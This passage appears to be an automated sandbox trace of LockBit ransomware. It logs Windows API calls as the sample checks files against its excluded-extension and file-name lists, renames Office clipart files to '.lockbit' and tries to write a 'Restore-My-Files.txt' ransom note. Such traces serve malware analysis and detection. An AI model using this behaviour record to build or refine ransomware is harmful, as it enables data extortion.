lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.735] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.735] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.735] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.735] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.735] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.735] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE03451_.WMF") returned 1 [0167.735] lstrcmpiW (lpString1="ntldr", lpString2="PE03451_.WMF") returned -1 [0167.735] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE03451_.WMF") returned -1 [0167.735] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE03451_.WMF") returned -1 [0167.735] lstrcmpiW (lpString1="autorun.inf", lpString2="PE03451_.WMF") returned -1 [0167.735] lstrcmpiW (lpString1="thumbs.db", lpString2="PE03451_.WMF") returned 1 [0167.736] lstrcmpiW (lpString1="iconcache.db", lpString2="PE03451_.WMF") returned -1 [0167.736] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.736] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03451_.WMF") returned=".WMF" [0167.736] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.736] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.736] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.736] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.736] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.736] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.736] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.736] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.736] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.736] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.736] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.736] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.736] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.736] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.736] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.736] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.736] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.736] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.736] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.736] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.736] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.736] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.736] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.736] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.736] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.737] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.737] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.737] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.737] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03451_.WMF.lockbit") returned 72 [0167.737] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03451_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03451_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0167.738] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.738] malloc (_Size=0x40068) returned 0x3df0008 [0167.738] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=8456) returned 1 [0167.738] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.739] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.739] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.739] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.739] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.744] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03451_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03451_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.744] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.744] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.745] free (_Block=0x1fa2ed8) [0167.745] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03451_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.745] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.746] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.746] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d695e00, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x59cdb0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1d695e00, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1f24, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE03453_.WMF", cAlternateFileName="")) returned 1 [0167.746] lstrcmpiW (lpString1=".", lpString2="PE03453_.WMF") returned -1 [0167.746] lstrcmpiW (lpString1="..", lpString2="PE03453_.WMF") returned -1 [0167.746] PathFindExtensionW (pszPath="PE03453_.WMF") returned=".WMF" [0167.746] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.746] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.746] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.746] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.746] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.746] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.746] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.746] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.746] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.746] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.746] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.746] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.746] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.746] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.746] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.746] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.746] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.747] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.747] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.747] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.747] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.747] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.747] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.747] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.747] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.747] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.747] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.747] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.747] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.747] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.747] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.747] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.747] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.747] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.747] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.747] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.747] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.747] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.747] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.747] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.747] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.747] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.747] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.747] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.748] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.748] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.748] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.748] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE03453_.WMF") returned 1 [0167.748] lstrcmpiW (lpString1="ntldr", lpString2="PE03453_.WMF") returned -1 [0167.748] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE03453_.WMF") returned -1 [0167.748] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE03453_.WMF") returned -1 [0167.748] lstrcmpiW (lpString1="autorun.inf", lpString2="PE03453_.WMF") returned -1 [0167.748] lstrcmpiW (lpString1="thumbs.db", lpString2="PE03453_.WMF") returned 1 [0167.748] lstrcmpiW (lpString1="iconcache.db", lpString2="PE03453_.WMF") returned -1 [0167.748] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.748] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03453_.WMF") returned=".WMF" [0167.748] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.748] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.748] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.748] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.748] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.748] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.748] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.748] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.748] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.748] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.748] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.748] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.748] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.749] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.749] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.749] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.749] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.749] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.749] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.749] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.749] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.749] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.749] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.749] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.749] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.749] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.749] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.749] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.749] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03453_.WMF.lockbit") returned 72 [0167.749] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03453_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03453_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0167.750] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.750] malloc (_Size=0x40068) returned 0x3df0008 [0167.750] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7972) returned 1 [0167.751] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.751] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.751] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.751] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.752] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.752] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.752] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.757] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03453_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03453_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.757] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.757] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0167.758] free (_Block=0x1fa2ed8) [0167.758] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03453_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.758] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.758] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.758] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x59cdb0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2178, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE03459_.WMF", cAlternateFileName="")) returned 1 [0167.758] lstrcmpiW (lpString1=".", lpString2="PE03459_.WMF") returned -1 [0167.758] lstrcmpiW (lpString1="..", lpString2="PE03459_.WMF") returned -1 [0167.758] PathFindExtensionW (pszPath="PE03459_.WMF") returned=".WMF" [0167.758] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.758] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.758] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.758] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.758] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.759] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.759] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.759] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.759] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.759] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.759] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.759] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.759] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.759] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.759] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.759] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.759] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.759] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.759] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.759] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.759] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.759] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.759] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.759] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.759] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.759] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.759] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.759] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.759] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.759] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.759] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.759] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.760] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.760] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.760] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.760] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.760] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.760] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.760] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.760] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.760] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.760] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.760] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.760] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.760] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.760] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.760] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.760] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE03459_.WMF") returned 1 [0167.760] lstrcmpiW (lpString1="ntldr", lpString2="PE03459_.WMF") returned -1 [0167.760] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE03459_.WMF") returned -1 [0167.760] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE03459_.WMF") returned -1 [0167.760] lstrcmpiW (lpString1="autorun.inf", lpString2="PE03459_.WMF") returned -1 [0167.760] lstrcmpiW (lpString1="thumbs.db", lpString2="PE03459_.WMF") returned 1 [0167.760] lstrcmpiW (lpString1="iconcache.db", lpString2="PE03459_.WMF") returned -1 [0167.760] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.760] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03459_.WMF") returned=".WMF" [0167.760] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.760] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.760] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.760] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.761] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.761] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.761] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.761] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.761] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.761] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.761] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.761] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.761] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.761] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.761] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.761] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.761] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.761] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.761] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.761] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.761] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.761] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.761] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.761] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.761] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.761] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.761] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.761] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.761] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03459_.WMF.lockbit") returned 72 [0167.761] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03459_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03459_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0167.763] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.763] malloc (_Size=0x40068) returned 0x3df0008 [0167.763] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=8568) returned 1 [0167.763] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.764] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.764] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.764] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.764] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.764] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.764] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.786] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03459_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03459_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.786] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.786] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.788] free (_Block=0x1fa2ed8) [0167.788] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03459_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.788] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.788] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft 